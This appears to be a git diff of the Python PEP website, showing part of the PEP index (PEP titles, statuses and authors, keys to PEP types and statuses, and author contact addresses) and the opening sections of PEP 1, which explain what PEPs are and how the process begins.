SR 315 | Enhanced While Loop | Raymond Hettinger, W Isaac Carroll | 2.5
SR 317 | Eliminate Implicit Exception Instantiation | Steven Taschuk | 2.4
SR 319 | Python Synchronize/Asynchronize Block | Michel Pelletier | 2.4
SW 321 | Date/Time Parsing and Formatting | A.M. Kuchling | 2.4
SR 325 | Resource-Release Support for Generators | Samuele Pedroni | 2.4
SR 326 | A Case for Top and Bottom Values | Josiah Carlson, Terry Reedy | 2.4
SR 329 | Treating Builtins as Constants in the Standard Library | Raymond Hettinger | 2.4
SR 330 | Python Bytecode Verification | Michel Pelletier | 2.6
SR 332 | Byte vectors and String/Unicode Unification | Skip Montanaro | 2.5
SW 334 | Simple Coroutines via SuspendIteration | Clark C. Evans | 3.0
SR 335 | Overloadable Boolean Operators | Gregory Ewing | 3.3
SR 336 | Make None Callable | Andrew McClelland
IW 339 | Design of the CPython Compiler | Brett Cannon
SR 340 | Anonymous Block Statements | Guido van Rossum
SS 344 | Exception Chaining and Embedded Tracebacks | Ka-Ping Yee | 2.5
SS 345 | Metadata for Python Software Packages 1.2 | Richard Jones | 2.7
SW 346 | User Defined (“with”) Statements | Alyssa Coghlan | 2.5
SR 348 | Exception Reorganization for Python 3.0 | Brett Cannon
SR 349 | Allow str() to return unicode strings | Neil Schemenauer | 2.5
IR 350 | Codetags | Micah Elliott
SR 351 | The freeze protocol | Barry Warsaw
SS 354 | Enumerations in Python | Ben Finney | 2.6
SR 355 | Path - Object oriented filesystem paths | Björn Lindqvist | 2.5
SW 359 | The “make” Statement | Steven Bethard | 2.6
SR 363 | Syntax For Dynamic Attribute Access | Ben North
SW 364 | Transitioning to the Py3K Standard Library | Barry Warsaw | 2.6
SR 365 | Adding the pkg_resources module | Phillip J. Eby
SS 367 | New Super | Calvin Spealman, Tim Delaney | 2.6
SW 369 | Post import hooks | Christian Heimes | 2.6, 3.0
SR 377 | Allow __enter__() methods to skip the statement body | Alyssa Coghlan | 2.7, 3.1
SW 379 | Adding an Assignment Expression | Jervis Whitley | 2.7, 3.2
SW 381 | Mirroring infrastructure for PyPI | Tarek Ziadé, Martin von Löwis
SR 382 | Namespace Packages | Martin von Löwis | 3.2
SS 386 | Changing the version comparison module in Distutils | Tarek Ziadé
SR 390 | Static metadata for Distutils | Tarek Ziadé | 2.7, 3.2
SW 395 | Qualified Names for Modules | Alyssa Coghlan | 3.4
IW 396 | Module Version Numbers | Barry Warsaw
PR 401 | BDFL Retirement | Barry Warsaw, Brett Cannon
SR 402 | Simplified Package Layout and Partitioning | Phillip J. Eby | 3.3
SW 406 | Improved Encapsulation of Import State | Alyssa Coghlan, Greg Slodkowicz | 3.4
SR 408 | Standard library __preview__ package | Alyssa Coghlan, Eli Bendersky | 3.3
SR 410 | Use decimal.Decimal type for timestamps | Victor Stinner | 3.3
IS 411 | Provisional packages in the Python standard library | Alyssa Coghlan, Eli Bendersky | 3.3
PW 413 | Faster evolution of the Python Standard Library | Alyssa Coghlan
SR 416 | Add a frozendict builtin type | Victor Stinner | 3.3
SW 422 | Simpler customisation of class creation | Alyssa Coghlan, Daniel Urban | 3.5
IW 426 | Metadata for Python Software Packages 2.0 | Alyssa Coghlan, Daniel Holth, Donald Stufft
SS 431 | Time zone support improvements | Lennart Regebro
SW 432 | Restructuring the CPython startup sequence | Alyssa Coghlan, Victor Stinner, Eric Snow
SS 433 | Easier suppression of file descriptor inheritance | Victor Stinner | 3.4
SR 437 | A DSL for specifying signatures, annotations and argument converters | Stefan Krah | 3.4
SR 439 | Inclusion of implicit pip bootstrap in Python installation | Richard Jones | 3.4
SR 455 | Adding a key-transforming dictionary to collections | Antoine Pitrou | 3.5
SW 459 | Standard Metadata Extensions for Python Software Packages | Alyssa Coghlan
SW 460 | Add binary interpolation and formatting | Antoine Pitrou | 3.5
PW 462 | Core development workflow automation for CPython | Alyssa Coghlan
SR 463 | Exception-catching expressions | Chris Angelico | 3.5
SW 469 | Migration of dict iteration code to Python 3 | Alyssa Coghlan | 3.5
SR 472 | Support for indexing with keyword arguments | Stefano Borini, Joseph Martinot-Lagarde | 3.6
SR 473 | Adding structured data to built-in exceptions | Sebastian Kreft
PW 474 | Creating forge.python.org | Alyssa Coghlan
PW 481 | Migrate CPython to Git, Github, and Phabricator | Donald Stufft
SR 490 | Chain exceptions at C level | Victor Stinner | 3.6
IR 496 | Environment Markers | James Polley
PR 497 | A standard mechanism for backward compatibility | Ed Schofield
SR 500 | A protocol for delegating datetime methods to their tzinfo implementations | Alexander Belopolsky, Tim Peters
SW 501 | General purpose template literal strings | Alyssa Coghlan, Nick Humrich | 3.12
IR 502 | String Interpolation - Extended Discussion | Mike G. Miller | 3.6
SW 504 | Using the System RNG by default | Alyssa Coghlan | 3.6
PR 507 | Migrate CPython to Git and GitLab | Barry Warsaw
SS 509 | Add a private version to dict | Victor Stinner | 3.6
SR 510 | Specialize functions with guards | Victor Stinner | 3.6
SR 511 | API for code transformers | Victor Stinner | 3.6
IS 513 | A Platform Tag for Portable Linux Built Distributions | Robert T. McGibbon, Nathaniel J. Smith
SR 516 | Build system abstraction for pip/conda etc | Robert Collins, Nathaniel J. Smith
SW 521 | Managing global context via ‘with’ blocks in generators and coroutines | Nathaniel J. Smith | 3.6
SR 522 | Allow BlockingIOError in security sensitive APIs | Alyssa Coghlan, Nathaniel J. Smith | 3.6
SW 531 | Existence checking operators | Alyssa Coghlan | 3.7
SW 536 | Final Grammar for Literal String Interpolation | Philipp Angerer | 3.7
SR 542 | Dot Notation Assignment In Function Header | Markus Meskanen
SW 543 | A Unified TLS API for Python | Cory Benfield, Christian Heimes | 3.7
SR 546 | Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7 | Victor Stinner, Cory Benfield | 2.7
SR 548 | More Flexible Loop Control | R David Murray | 3.7
SR 549 | Instance Descriptors | Larry Hastings | 3.7
SW 550 | Execution Context | Yury Selivanov, Elvis Pranskevichus | 3.7
IW 551 | Security transparency in the Python runtime | Steve Dower | 3.7
SS 554 | Multiple Interpreters in the Stdlib | Eric Snow | 3.13
SW 555 | Context-local variables (contextvars) | Koos Zevenhoven | 3.7
SW 558 | Defined semantics for locals() | Alyssa Coghlan | 3.13
SR 559 | Built-in noop() | Barry Warsaw | 3.7
IS 571 | The manylinux2010 Platform Tag | Mark Williams, Geoffrey Thomas, Thomas Kluyver
SW 575 | Unifying function/method classes | Jeroen Demeyer | 3.8
SW 576 | Rationalize Built-in function classes | Mark Shannon | 3.8
SW 577 | Augmented Assignment Expressions | Alyssa Coghlan | 3.8
SR 580 | The C call protocol | Jeroen Demeyer | 3.8
SR 582 | Python local packages directory | Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan | 3.12
IW 583 | A Concurrency Memory Model for Python | Jeffrey Yasskin
IW 595 | Improving bugs.python.org | Ezio Melotti, Berker Peksag
IW 598 | Introducing incremental feature releases | Alyssa Coghlan | 3.9
IS 599 | The manylinux2014 Platform Tag | Dustin Ingram
SR 601 | Forbid return/break/continue breaking out of finally | Damien George, Batuhan Taskaya | 3.8
IR 605 | A rolling feature release stream for CPython | Steve Dower, Alyssa Coghlan | 3.9
SR 606 | Python Compatibility Version | Victor Stinner | 3.9
SR 608 | Coordinated Python release | Miro Hrončok, Victor Stinner | 3.9
SW 611 | The one million limit | Mark Shannon
SW 620 | Hide implementation details from the C API | Victor Stinner | 3.12
SS 622 | Structural Pattern Matching | Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin | 3.10
SS 631 | Dependency specification in pyproject.toml based on PEP 508 | Ofek Lev
SR 633 | Dependency specification in pyproject.toml using an exploded TOML table | Laurie Opperman, Arun Babu Neelicattu
SR 637 | Support for indexing with keyword arguments | Stefano Borini | 3.10
SR 640 | Unused variable syntax | Thomas Wouters | 3.10
SR 641 | Using an underscore in the version portion of Python 3.10 compatibility tags | Brett Cannon, Steve Dower, Barry Warsaw | 3.10
SR 642 | Explicit Pattern Syntax for Structural Pattern Matching | Alyssa Coghlan | 3.10
SW 645 | Allow writing optional types as x? | Maggie Moss
SR 648 | Extensible customizations of the interpreter at startup | Mario Corchero | 3.11
SW 650 | Specifying Installer Requirements for Python Projects | Vikram Jayanthi, Dustin Ingram, Brett Cannon
SR 651 | Robust Stack Overflow Handling | Mark Shannon
SR 662 | Editable installs via virtual wheels | Bernát Gábor
IR 663 | Standardizing Enum str(), repr(), and format() behaviors | Ethan Furman | 3.11
SR 665 | A file format to list Python dependencies for reproducibility of an application | Brett Cannon, Pradyun Gedam, Tzu-ping Chung
SR 666 | Reject Foolish Indentation | Laura Creighton | 2.2
SR 677 | Callable Type Syntax | Steven Troxler, Pradeep Kumar Srinivasan | 3.11
SR 690 | Lazy Imports | Germán Méndez Bravo, Carl Meyer | 3.12
SW 704 | Require virtual environments by default for package installers | Pradyun Gedam
SR 707 | A simplified signature for __exit__ and __aexit__ | Irit Katriel | 3.12
SR 712 | Adding a “converter” parameter to dataclasses.field | Joshua Cannon | 3.13
SR 713 | Callable Modules | Amethyst Reese | 3.12
SR 722 | Dependency specification for single-file scripts | Paul Moore
SW 724 | Stricter Type Guards | Rich Chiodo, Eric Traut, Erik De Bonte | 3.13
SR 726 | Module __setattr__ and __delattr__ | Sergey B Kirpichev | 3.13
SR 754 | IEEE 754 Floating Point Special Values | Gregory R. Warnes | 2.3
SW 756 | Add PyUnicode_Export() and PyUnicode_Import() C functions | Victor Stinner | 3.14
SW 760 | No More Bare Excepts | Pablo Galindo, Brett Cannon | 3.14
PW 3001 | Procedure for reviewing and improving standard library modules | Georg Brandl
SR 3103 | A Switch/Case Statement | Guido van Rossum | 3.0
SR 3117 | Postfix type declarations | Georg Brandl | 3.0
SR 3122 | Delineation of the main module | Brett Cannon
SR 3125 | Remove Backslash Continuation | Jim J. Jewett
SR 3126 | Remove Implicit String Concatenation | Jim J. Jewett, Raymond Hettinger
SR 3128 | BList: A Faster List-like Type | Daniel Stutzbach | 2.6, 3.0
SR 3130 | Access to Current Module/Class/Function | Jim J. Jewett | 3.0
SR 3133 | Introducing Roles | Collin Winter | 3.0
SR 3136 | Labeled break and continue | Matt Chisholm | 3.1
SR 3139 | Cleaning out sys and the “interpreter” module | Benjamin Peterson | 3.0
SR 3140 | str(container) should call str(item), not repr(item) | Oleg Broytman, Jim J. Jewett
SR 3142 | Add a “while” clause to generator expressions | Gerald Britton | 3.0
SW 3145 | Asynchronous I/O For subprocess.Popen | Eric Pruitt, Charles R. McCreary, Josiah Carlson | 3.2
SW 3146 | Merging Unladen Swallow into CPython | Collin Winter, Jeffrey Yasskin, Reid Kleckner | 3.3
SR 3152 | Cofunctions | Gregory Ewing | 3.3
SS 3153 | Asynchronous IO support | Laurens Van Houtven
IR 8010 | The Technical Leader Governance Model | Barry Warsaw
IR 8011 | Python Governance Model Lead by Trio of Pythonistas | Mariatta, Barry Warsaw
IR 8012 | The Community Governance Model | Łukasz Langa
IR 8013 | The External Council Governance Model | Steve Dower
IR 8014 | The Commons Governance Model | Jack Jansen
IR 8015 | Organization of the Python community | Victor Stinner
+
+
+
+

Reserved PEP Numbers

PEP | Title | Authors
801 | RESERVED | Warsaw
+
+
+

PEP Types Key

• I – Informational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
• P – Process: Normative PEP describing or proposing a change to a Python community process, workflow or governance
• S – Standards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem

More info in PEP 1.

+
+
+

PEP Status Key

• A – Accepted: Normative proposal accepted for implementation
• A – Active: Currently valid informational guidance, or an in-use process
• D – Deferred: Inactive draft that may be taken up again at a later time
• <No letter> – Draft: Proposal under active discussion and revision
• F – Final: Accepted and implementation complete, or no longer active
• P – Provisional: Provisionally accepted but additional feedback needed
• R – Rejected: Formally declined and will not be accepted
• S – Superseded: Replaced by another succeeding PEP
• W – Withdrawn: Removed from consideration by sponsor or authors

More info in PEP 1.
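As an illustrative decoding (using rows from the index tables above), each two-letter abbreviation combines a Type letter with a Status letter:

    SR 204  =  S (Standards Track) + R (Rejected)
    IW 103  =  I (Informational) + W (Withdrawn)
    PW 3    =  P (Process) + W (Withdrawn)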

+
+
+

Authors/Owners

Name | Email Address
A.M. Kuchling | amk at amk.ca
Aahz | aahz at pythoncraft.com
Adam Turner | python at quite.org.uk
Adrian Garcia Badaracco | adrian at adriangb.com
Alex Gaynor | alex.gaynor at gmail.com
Alex Martelli | aleaxit at gmail.com
Alexander Belopolsky | alexander.belopolsky at gmail.com
Alexandre Vassalotti | alexandre at peadrop.com
Alexis Challande | alexis.challande at trailofbits.com
Alice Purcell | alicederyn at gmail.com
Alyssa Coghlan | ncoghlan at gmail.com
Amethyst Reese | amethyst at n7.gg
Ammar Askar | ammar at ammaraskar.com
Andre Roberge | andre.roberge at gmail.com
Andrew McClelland | eternalsquire at comcast.net
Andrew McNamara | andrewm at object-craft.com.au
Anthony Baxter | anthony at interlink.com.au
Antoine Pitrou | solipsis at pitrou.net
Armin Ronacher | armin.ronacher at active-4.com
Arun Babu Neelicattu | arun.neelicattu at gmail.com
Atsuo Ishimoto | ishimoto at gembook.org
Barry Warsaw | barry at python.org
Batuhan Taskaya | batuhan at python.org
Ben Finney | ben+python at benfinney.id.au
Ben Hoyt | benhoyt at gmail.com
Ben North | ben at redfrontdoor.org
Benjamin Peterson | benjamin at python.org
Benoit Bryon | benoit at marmelune.net
Berker Peksag | berker.peksag at gmail.com
Bernát Gábor | gaborjbernat at gmail.com
Björn Lindqvist | bjourne at gmail.com
Brandt Bucher | brandt at python.org
Brett Cannon | brett at python.org
Brian Quinlan | brian at sweetapp.com
C.A.M. Gerlach | cam.gerlach at gerlach.cam
Calvin Spealman | ironfroggy at gmail.com
Cameron Simpson | cs at cskk.id.au
Carl Banks | pythondev at aerojockey.com
Carl Friedrich Bolz-Tereick | cfbolz at gmx.de
Carl Meyer | carl at oddbird.net
Carol Willing | willingc at gmail.com
Charles R. McCreary |
Charles-François Natali | cf.natali at gmail.com
Chris Angelico | rosuav at gmail.com
Chris Jerdonek | chris.jerdonek at gmail.com
Chris McDonough | chrism at plope.com
Christian Heimes | christian at python.org
Christian R. Reis | kiko at async.com.br
Christopher A. Craig | python-pep at ccraig.org
Christopher Barker | pythonchb at gmail.com
Clark C. Evans | cce at clarkevans.com
Cliff Wells | logiplexsoftware at earthlink.net
Collin Winter | collinwinter at google.com
Cooper Lees | me at cooperlees.com
Cory Benfield | cory at lukasa.co.uk
Damien George |
Daniel F Moisset | dfmoisset at gmail.com
Daniel Holth | dholth at gmail.com
Daniel Stutzbach | daniel at stutzbachenterprises.com
Daniel Urban | urban.dani+py at gmail.com
Dave Cole | djc at object-craft.com.au
Dave Peck | davepeck at davepeck.org
David Ascher | davida at activestate.com
David Eppstein | eppstein at ics.uci.edu
David Foster | david at dafoster.net
David Goodger | goodger at python.org
David Hewitt | 1939362+davidhewitt at users.noreply.github.com
David Woods | dw-git at d-woods.co.uk
Dennis Sweeney | sweeney.dennis650 at gmail.com
Dino Viehland | dinov at microsoft.com
Dirkjan Ochtman | dirkjan at ochtman.nl
Domenico Andreoli | domenico.andreoli at linux.com
Donald Stufft | donald at stufft.io
Donghee Na | donghee.na at python.org
Doug Hellmann | doug at doughellmann.com
Dustin Ingram | di at python.org
Ed Schofield | ed at pythoncharmers.com
Eddie Elizondo | eduardo.elizondorueda at gmail.com
Ee Durbin | ee at python.org
Elana Hashman | ehashman at debian.org
Eli Bendersky | eliben at gmail.com
Elvis Pranskevichus | elvis at edgedb.com
Emily Morehouse-Valcarcel | emily at python.org
Eneg | eneg at discuss.python.org
Eric N. Vander Weele | ericvw at gmail.com
Eric Pruitt |
Eric Snow | ericsnowcurrently at gmail.com
Eric Traut | erictr at microsoft.com
Eric V. Smith | eric at trueblade.com
Erik De Bonte | erikd at microsoft.com
Erik M. Bray |
Erlend Egeberg Aasland | erlend at python.org
Ethan Furman | ethan at stoneleaf.us
Ethan Smith | ethan at ethanhs.me
Ewa Jodlowska | ewa at python.org
Ezio Melotti | ezio.melotti at gmail.com
Facundo Batista | facundo at taniquetil.com.ar
Facundo Tuesca | facundo.tuesca at trailofbits.com
Filipe Laíns | lains at riseup.net
Franek Magiera | framagie at gmail.com
Fred L. Drake, Jr. | fred at fdrake.net
Frédéric B. Giacometti | fred at arakne.com
Fridolín Pokorný | fridolin.pokorny at gmail.com
Geoffrey Thomas | geofft at ldpreload.com
Georg Brandl | georg at python.org
Gerald Britton | gerald.britton at gmail.com
Germán Méndez Bravo | german.mb at gmail.com
Gordon McMillan | gmcm at hypernet.com
Graham Bleaney | gbleaney at gmail.com
Grant Griffin | g2 at iowegian.com
Greg Slodkowicz | jergosh at gmail.com
Greg Stein | gstein at lyra.org
Greg Wilson | gvwilson at ddj.com
Gregory Ewing | greg.ewing at canterbury.ac.nz
Gregory Lielens | gregory.lielens at fft.be
Gregory P. Smith | greg at krypto.org
Gregory R. Warnes | gregory_r_warnes at groton.pfizer.com
Guido van Rossum | guido at python.org
Holger Krekel | holger at merlinux.eu
Huaiyu Zhu | hzhu at users.sourceforge.net
Hugo van Kemenade |
Inada Naoki | songofacandy at gmail.com
Irit Katriel | irit at python.org
Ivan Levkivskyi | levkivskyi at gmail.com
Ivona Stojanovic | stojanovic.i at hotmail.com
Jack Diederich | jackdied at gmail.com
Jack Jansen | jack at cwi.nl
James C. Ahlstrom | jim at interet.com
James Hilton-Balfe | gobot1234yt at gmail.com
James Polley | jp at jamezpolley.com
Jason Orendorff | jason.orendorff at gmail.com
Jason Petrone | jp at demonseed.net
Jeff Epler | jepler at unpythonic.net
Jeffrey Yasskin | jyasskin at google.com
Jelle Zijlstra | jelle.zijlstra at gmail.com
Jeremy Hylton | jeremy at alum.mit.edu
Jeroen Demeyer | j.demeyer at ugent.be
Jervis Whitley | jervisau at gmail.com
Jesse Noller | jnoller at gmail.com
Jim Althoff | james_althoff at i2.com
Jim Baker | jim.baker at python.org
Jim J. Jewett | jimjjewett at gmail.com
Jiwon Seo | seojiwon at gmail.com
Joanna Jablonski |
Joe Carey | joe at python.org
John Belmonte | john at neggie.net
Jonathan Riehl | jriehl at spaceship.com
Joop van de Pol | joop.vandepol at trailofbits.com
Joseph Jevnik | joejev at gmail.com
Joseph Martinot-Lagarde |
Joshua Bambrick | jbambrick at google.com
Joshua Cannon | joshdcannon at gmail.com
Joshua Landau | joshua at landau.ws
Joshua Lock | jlock at vmware.com
Joshua Xu | jxu425 at fb.com
Josiah Carlson | jcarlson at uci.edu
Jukka Lehtosalo | jukka.lehtosalo at iki.fi
Julien Palard | julien at palard.fr
Just van Rossum | just at letterror.com
Justin Cappos | jcappos at nyu.edu
Ka-Ping Yee | ping at zesty.ca
Karl Nelson | nelson85 at llnl.gov
Karolina Surma | karolina.surma at gazeta.pl
Ken Jin | kenjin at python.org
Kerrick Staley | mail at kerrickstaley.com
Kevin Altis | altis at semi-retired.com
Kevin D. Smith | kevin.smith at themorgue.org
Konstantin Kashin | kkashin at fb.com
Koos Zevenhoven | k7hoven at gmail.com
Koudai Aono | koxudaxi at gmail.com
Kushal Das | mail at kushaldas.in
Larry Hastings | larry at hastings.org
Laura Creighton | lac at strakt.com
Laurens Van Houtven | _ at lvh.cc
Laurie Opperman | laurie_opperman at hotmail.com
Lennart Regebro | regebro at gmail.com
Lie Ryan | lie.1296 at gmail.com
Lino Mastrodomenico | l.mastrodomenico at gmail.com
Lisa Roach | lisaroach14 at gmail.com
Lois Anne DeLong | lad278 at nyu.edu
Lukas Puehringer | lukas.puehringer at nyu.edu
Lysandros Nikolaou | lisandrosnik at gmail.com
Maggie Moss | maggiebmoss at gmail.com
Magnus Lie Hetland | magnus at hetland.org
Malcolm Smith | smith at chaquo.com
Marc-Andre Lemburg | mal at lemburg.com
Marc-André Lemburg | mal at lemburg.com
Marcel Plch | gmarcel.plch at gmail.com
Mariatta | mariatta at python.org
Marina Moore | mm9693 at nyu.edu
Mario Corchero | mariocj89 at gmail.com
Mark E. Haase | mehaase at gmail.com
Mark Hammond | mhammond at skippinet.com.au
Mark Mendoza | mendoza.mark.a at gmail.com
Mark Shannon | mark at hotpy.org
Mark Williams | mrw at enotuniq.org
Markus Meskanen | markusmeskanen at gmail.com
Marta Gómez Macías | cyberwitch at google.com
Martijn Faassen | faassen at infrae.com
Martin Teichmann | lkb.teichmann at gmail.com
Martin von Löwis | martin at v.loewis.de
Masayuki Yamamoto |
Matt Chisholm | matt-python at theory.org
Matt Wozniski | godlygeek at gmail.com
Matthew Rahtz | mrahtz at google.com
Matthias Klose | doko at ubuntu.com
Micah Elliott | mde at tracos.org
Michael Foord | michael at python.org
Michael Hudson | mwh at python.net
Michael J. Sullivan | sully at msully.net
Michael Lee | michael.lee.0x2a at gmail.com
Michael P. Dubner | dubnerm at mindless.com
Michael Sarahan | msarahan at gmail.com
Michel Pelletier | michel at users.sourceforge.net
Mike G. Miller |
Mike Meyer | mwm at mired.org
Mike Verdone | mike.verdone at gmail.com
Miro Hrončok | miro at hroncok.cz
Moshe Zadka | moshez at zadka.site.co.il
Nathaniel J. Smith | njs at pobox.com
Neal Norwitz | nnorwitz at gmail.com
Ned Deily | nad at python.org
Neil Hodgson | neilh at scintilla.org
Neil Schemenauer | nas at arctrix.com
Nick Humrich | nick at humrich.us
Ofek Lev | ofekmeister at gmail.com
Oleg Broytman | phd at phdru.name
Oren Tirosh | oren at hishome.net
Pablo Galindo | pablogsal at python.org
Pablo Galindo Salgado | pablogsal at python.org
Patrick Maupin | pmaupin at gmail.com
Paul Barrett | barrett at stsci.edu
Paul Colomiets | paul at colomiets.name
Paul Everitt | pauleveritt at me.com
Paul F. Dubois | paul at pfdubois.com
Paul Ganssle | paul at ganssle.io
Paul Moore | p.f.moore at gmail.com
Paul Prescod | paul at prescod.net
Peter Astrand | astrand at lysator.liu.se
Peter Harris | scav at blueyonder.co.uk
Peter Moody | pmoody at google.com
Peter Schneider-Kamp | nowonder at nowonder.de
Petr Viktorin | encukou at gmail.com
Philip House | phouse512 at gmail.com
Philipp Angerer | phil.angerer at gmail.com
Philippe Ombredanne | pombredanne at nexb.com
Philippe PRADOS | python at prados.fr
Phillip J. Eby | pje at telecommunity.com
Pradeep Kumar Srinivasan | gohanpra at gmail.com
Pradyun Gedam | pradyunsg at gmail.com
R David Murray |
Ralf Gommers | ralf.gommers at gmail.com
Raymond Hettinger | python at rcn.com
Reid Kleckner | rnk at mit.edu
Rich Chiodo | rchiodo at microsoft.com
Richard Jones | richard at python.org
Richard Oudkerk | r.m.oudkerk at googlemail.com
Robert Collins | rbtcollins at hp.com
Robert Kuska | rkuska at redhat.com
Robert T. McGibbon | rmcgibbo at gmail.com
Roman Suzi | rnd at onego.ru
Ronald Oussoren | ronaldoussoren at mac.com
Russell Keith-Magee | russell at keith-magee.com
Ryan Gonzalez | rymg19 at gmail.com
Sam Gross | colesbury at gmail.com
Samuele Pedroni | pedronis at python.org
Savannah Ostrowski | savannahostrowski at gmail.com
Scott Gilbert | xscottg at yahoo.com
Sean Reifschneider | jafo-pep at tummy.com
Sebastian Kreft | skreft at deezer.com
Sebastián Ramírez | tiangolo at gmail.com
Sergey B Kirpichev | skirpichev at gmail.com
Serhiy Storchaka |
Seth Michael Larson | seth at python.org
Sébastien Eustace | sebastien at eustace.io
Shannon Zhu | szhu at fb.com
Shantanu Jain | hauntsaninja at gmail.com
Simon Cross | hodgestar at gmail.com
Skip Montanaro | skip at pobox.com
Stefan Behnel | stefan_ml at behnel.de
Stefan Krah | skrah at bytereef.org
Stefano Borini |
Stefano Rivera | stefanor at debian.org
Stepan Koltsov | yozh at mx1.ru
Stepan Sindelar | stepan.sindelar at oracle.com
Stephen J. Turnbull | stephen at xemacs.org
Stephen Rosen | sirosen0 at gmail.com
Steve Dower | steve.dower at python.org
Steven Bethard | steven.bethard at gmail.com
Steven D’Aprano | steve at pearwood.info
Steven Taschuk | staschuk at telusplanet.net
Steven Troxler | steven.troxler at gmail.com
Stéphane Bidoul | stephane.bidoul at gmail.com
Sumana Harihareswara | sh at changeset.nyc
Tal Einat | tal at python.org
Talin | viridia at gmail.com
Taneli Hukkinen |
Tarek Ziadé | tarek at ziade.org
Terence Way | terry at wayforward.net
Terry Reedy | tjreedy at udel.edu
The Python core team and community |
Thomas Bellman | bellman+pep-divmod at lysator.liu.se
Thomas Heller | theller at python.net
Thomas Kluyver | thomas at kluyver.me.uk
Thomas Wouters | thomas at python.org
Tian Gao | gaogaotiantian at hotmail.com
Till Varoquaux | till at fb.com
Tim Delaney | timothy.c.delaney at gmail.com
Tim Felgentreff | tim.felgentreff at oracle.com
Tim Peters | tim.peters at gmail.com
Tobias Kohn | kohnt at tobiaskohn.ch
Todd Rovito | rovitotv at gmail.com
Tomáš Orsava | tomas.n at orsava.cz
Tony Lownds | tony at lownds.com
Travis Oliphant | oliphant at ee.byu.edu
Trent Mick | trentm at activestate.com
Trishank Karthik Kuppusamy | karthik at trishank.com
Tzu-ping Chung | uranusjr at gmail.com
Victor Stinner | vstinner at python.org
Vikram Jayanthi | vikramjayanthi at google.com
Vinay Sajip | vinay_sajip at red-dove.com
Vincent Siles | vsiles at fb.com
Vladimir Diaz | vladimir.diaz at nyu.edu
W Isaac Carroll | icarroll at pobox.com
Walter Dörwald | walter at livinglogic.de
Wenzel Jakob | wenzel.jakob at epfl.ch
William Woodruff | william at yossarian.net
Yury Selivanov | yury at edgedb.com
Zac Hatfield-Dodds | zac at zhd.dev
Zachary Ware | zach at python.org
Zixuan James Li | p359101898 at gmail.com
Łukasz Langa | lukasz at python.org
+
+
\ No newline at end of file
diff --git a/pep-0001/index.html b/pep-0001/index.html
new file mode 100644
index 00000000000..1ee12682223
--- /dev/null
+++ b/pep-0001/index.html
@@ -0,0 +1,849 @@
+
+

+
+
+

PEP 1 – PEP Purpose and Guidelines

Author: Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
Status: Active
Type: Process
Created: 13-Jun-2000
Post-History: 21-Mar-2001, 29-Jul-2002, 03-May-2003, 05-May-2012, 07-Apr-2013
+
+
+
+

What is a PEP?

+

PEP stands for Python Enhancement Proposal. A PEP is a design document providing information to the Python community, or describing a new feature for Python or its processes or environment. The PEP should provide a concise technical specification of the feature and a rationale for the feature.

We intend PEPs to be the primary mechanisms for proposing major new features, for collecting community input on an issue, and for documenting the design decisions that have gone into Python. The PEP author is responsible for building consensus within the community and documenting dissenting opinions.

Because the PEPs are maintained as text files in a versioned repository, their revision history is the historical record of the feature proposal. This historical record is available by the normal git commands for retrieving older revisions, and can also be browsed on GitHub.

+
+
+

PEP Audience

+

The typical primary audience for PEPs are the core developers of the CPython reference interpreter and their elected Steering Council, as well as developers of other implementations of the Python language specification.

However, other parts of the Python community may also choose to use the process (particularly for Informational PEPs) to document expected API conventions and to manage complex design coordination problems that require collaboration across multiple projects.

+
+
+

PEP Types

+

There are three kinds of PEP:

1. A Standards Track PEP describes a new feature or implementation for Python. It may also describe an interoperability standard that will be supported outside the standard library for current Python versions before a subsequent PEP adds standard library support in a future version.

2. An Informational PEP describes a Python design issue, or provides general guidelines or information to the Python community, but does not propose a new feature. Informational PEPs do not necessarily represent a Python community consensus or recommendation, so users and implementers are free to ignore Informational PEPs or follow their advice.

3. A Process PEP describes a process surrounding Python, or proposes a change to (or an event in) a process. Process PEPs are like Standards Track PEPs but apply to areas other than the Python language itself. They may propose an implementation, but not to Python’s codebase; they often require community consensus; unlike Informational PEPs, they are more than recommendations, and users are typically not free to ignore them. Examples include procedures, guidelines, changes to the decision-making process, and changes to the tools or environment used in Python development. Any meta-PEP is also considered a Process PEP.
+
+
+

PEP Workflow

+
+

Python’s Steering Council

+

There are several references in this PEP to the “Steering Council” or “Council”. This refers to the current members of the elected Steering Council described in PEP 13, in their role as the final authorities on whether or not PEPs will be accepted or rejected.

+
+
+

Python’s Core Developers

+

There are several references in this PEP to “core developers”. This refers to the currently active Python core team members described in PEP 13.

+
+
+

Python’s BDFL

+

Previous versions of this PEP used the title “BDFL-Delegate” for PEP decision makers. This was a historical reference to Python’s previous governance model, where all design authority ultimately derived from Guido van Rossum, the original creator of the Python programming language. By contrast, the Steering Council’s design authority derives from their election by the currently active core developers. Now, PEP-Delegate is used in place of BDFL-Delegate.

+
+
+

PEP Editors

+

The PEP editors are individuals responsible for managing the administrative and editorial aspects of the PEP workflow (e.g. assigning PEP numbers and changing their status). See PEP Editor Responsibilities & Workflow for details.

PEP editorship is by invitation of the current editors, and they can be contacted by mentioning @python/pep-editors on GitHub. All of the PEP workflow can be conducted via the GitHub PEP repository issues and pull requests.

+
+
+

Start with an idea for Python

+

The PEP process begins with a new idea for Python. It is highly recommended that a single PEP contain a single key proposal or new idea; the more focused the PEP, the more successful it tends to be. Most enhancements and bug fixes don’t need a PEP and can be submitted directly to the Python issue tracker. The PEP editors reserve the right to reject PEP proposals if they appear too unfocused or too broad. If in doubt, split your PEP into several well-focused ones.

Each PEP must have a champion – someone who writes the PEP using the style and format described below, shepherds the discussions in the appropriate forums, and attempts to build community consensus around the idea. The PEP champion (a.k.a. Author) should first attempt to ascertain whether the idea is PEP-able. Posting to the Ideas category of the Python Discourse is usually the best way to go about this, unless a more specialized venue is appropriate, such as the Typing category (for static typing ideas) or Packaging category (for packaging ideas) on the Python Discourse.

Vetting an idea publicly before going as far as writing a PEP is meant to save the potential author time. Many ideas have been brought forward for changing Python that have been rejected for various reasons. Asking the Python community first if an idea is original helps prevent too much time being spent on something that is guaranteed to be rejected based on prior discussions (searching the internet does not always do the trick). It also helps to make sure the idea is applicable to the entire community and not just the author. Just because an idea sounds good to the author does not mean it will work for most people in most areas where Python is used.

